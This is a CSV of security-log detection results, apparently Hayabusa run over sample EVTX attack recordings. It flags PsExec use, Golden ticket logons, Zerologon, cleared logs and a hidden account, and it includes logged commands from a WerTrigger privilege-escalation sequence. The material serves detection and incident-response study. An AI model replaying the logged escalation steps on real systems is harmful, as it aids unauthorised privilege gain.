Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1 : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx -2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx -2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 
10.23.23.9 : Port: 50380 : LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50317 : LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - 
Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: 04246W-WIN10 : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60728 : LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 : Path: 
C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser : Type: 2 : Workstation: MSEDGEWIN10 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-09 22:18:27.714 
+09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd8f6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd964 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx -2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx -2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx -2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx -2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01 : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\inetsrv\w3wp.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx -2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx -2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx -2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx -2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation 02694W-WIN10 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49959 : LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-24 01:49:41.578 
+09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx -2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx -2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50106 : LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
